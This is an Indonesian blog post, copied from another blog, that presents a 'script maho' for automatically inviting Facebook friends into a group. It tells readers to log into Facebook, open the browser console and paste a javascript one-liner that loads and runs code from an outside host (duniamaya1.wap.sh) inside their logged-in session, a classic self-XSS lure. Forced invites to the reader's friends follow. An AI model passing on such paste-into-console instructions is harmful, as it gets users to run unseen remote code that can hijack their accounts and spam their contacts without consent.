Kamis, 16 Agustus 2012

script maho versi auto invite member ke dalam grup

malam ini Akyra akan posting hasil Copas'an Akyra dari blog teman akyra

pertama silahkan sobat buka mozila/google chrome sobat lalu login facebook setelah itu silahkan sobat gabung ke dalam group ini untuk praktek supaya tidak terjadi kesalahan nantinya 
https://www.facebook.com/groups/456435237722083/ silahkan gabung dulu supaya praktek bisa sukses gan masih anget scripnya ...hehehehe dengan sobat tes scrip ini di grup tersebut supaya tidak ada kesalahan nantinya untuk praktek d grup sobat...hehehe

kalu sudah sobat buka group yang tadi lalu sobat tekan CTRL+SHIFT+K (mozilla)setelah itu agan masukan script ini 
javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://duniamaya1.wap.sh/autoinvite2012';})(); 
ke dalam kotak kecil; sesuai ss di bawah ini 

kalau sobat sudah mengikuti intruksi yang saya kasih silahkan tekan enter lalu tunggu sampai loading selesai baru sobat reload browser sobat dream cyber comunity :D di jamin sobat nambah ganteng deh ...hhehehehehehe
 kalau SS nya kurang jelas silahkan sobat klik ss nya untuk memperbesar gambar......
jika masih bingung juga silahkan sobat tanya ke dalam group tersebut atau tinggalkan komentar sobat disini ...hehehehehe
sekian coretan sinchankeke ganteng tentang scrip maho versi auto invet member ke dalam group facebook...jika ada salah salah kata mohon di maafkan yah :D gunakan tutor ini sebijak mungkin karena belum tentu teman2 facebook sobat senang dengan di inbet secara paksa :D

sumber : Blog teman

*update



kalo di mozilla kan pake CTRL+Shift+K
nah kalo di google chrome pake ini


1. Klik Kanan
2. Pilih Inspect Element and Console
3. Masukkan deh kode skrip tadi ^_^

2 komentar:

  1. katanya anak MAN pinter pinter,saya orang bodoh coba kita adu blogger perbagus bagu hayoo.,?


    halimnewbie.blogspot.com

    BalasHapus
  2. hahaha
    kata siapa pinter2
    saya sendiri aja bodoh

    BalasHapus

simple

simple

tam hu

free counters
DON'T FORGET FOLLOW ME AND LEAVE YOUR COMMENT!